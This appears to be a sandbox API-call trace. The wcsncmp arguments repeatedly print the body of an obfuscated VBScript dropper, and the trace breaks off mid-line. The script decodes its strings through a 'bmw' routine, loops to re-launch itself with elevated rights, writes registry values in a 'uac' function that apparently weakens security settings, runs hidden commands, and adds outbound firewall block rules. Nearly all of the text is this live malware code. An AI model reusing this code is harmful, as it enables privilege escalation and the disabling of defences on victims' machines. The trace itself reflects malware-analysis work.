= CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 82 [0222.985] wcsncmp (_String1="RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0222.985] wcsncmp (_String1="ULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 72 [0222.985] wcsncmp (_String1="LE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0222.985] wcsncmp (_String1="E_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0222.985] wcsncmp (_String1="_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 